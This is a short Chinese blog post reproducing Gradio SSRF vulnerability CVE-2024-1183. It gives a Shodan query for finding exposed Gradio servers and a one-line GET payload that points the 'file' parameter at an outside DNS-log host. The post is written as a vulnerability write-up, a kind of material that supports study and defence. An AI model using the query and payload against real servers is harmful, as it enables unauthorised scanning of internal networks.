当前位置:   article > 正文

【漏洞复现】Gradio file SSRF漏洞(CVE-2024-1183)

cve-2024-1183

0x01 产品简介

Gradio是一个用于创建机器学习模型交互式界面的Python库。它可以帮助用户快速地为模型构建一个可视化的、易于使用的Web界面,无需编写任何Web前端代码。通过Gradio,用户可以定义输入组件和输出组件,以接收用户输入和展示模型的预测结果。此外,Gradio支持多种不同类型的输入(如文本、图像、音频等)和输出(如文本、图像、HTML等),并可以与大多数Python机器学习框架(如TensorFlow、PyTorch等)和常见的数据处理库(如NumPy、Pandas等)无缝集成。

0x02 漏洞概述

Gradio存在SSRF漏洞,未授权的攻击者可以通过该漏洞扫描和识别内部网络中的开放端口,通过操纵GET请求中的"file"参数,攻击者可以根据响应中是否存在"Location"标头或"File not allowed"错误来辨别内部端口的状态。

0x03 测绘语句

shodan:html:"__gradio_mode__"

0x04 漏洞复现

  1. GET /file=http://{
  2. {dnslog}} HTTP/1.1

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号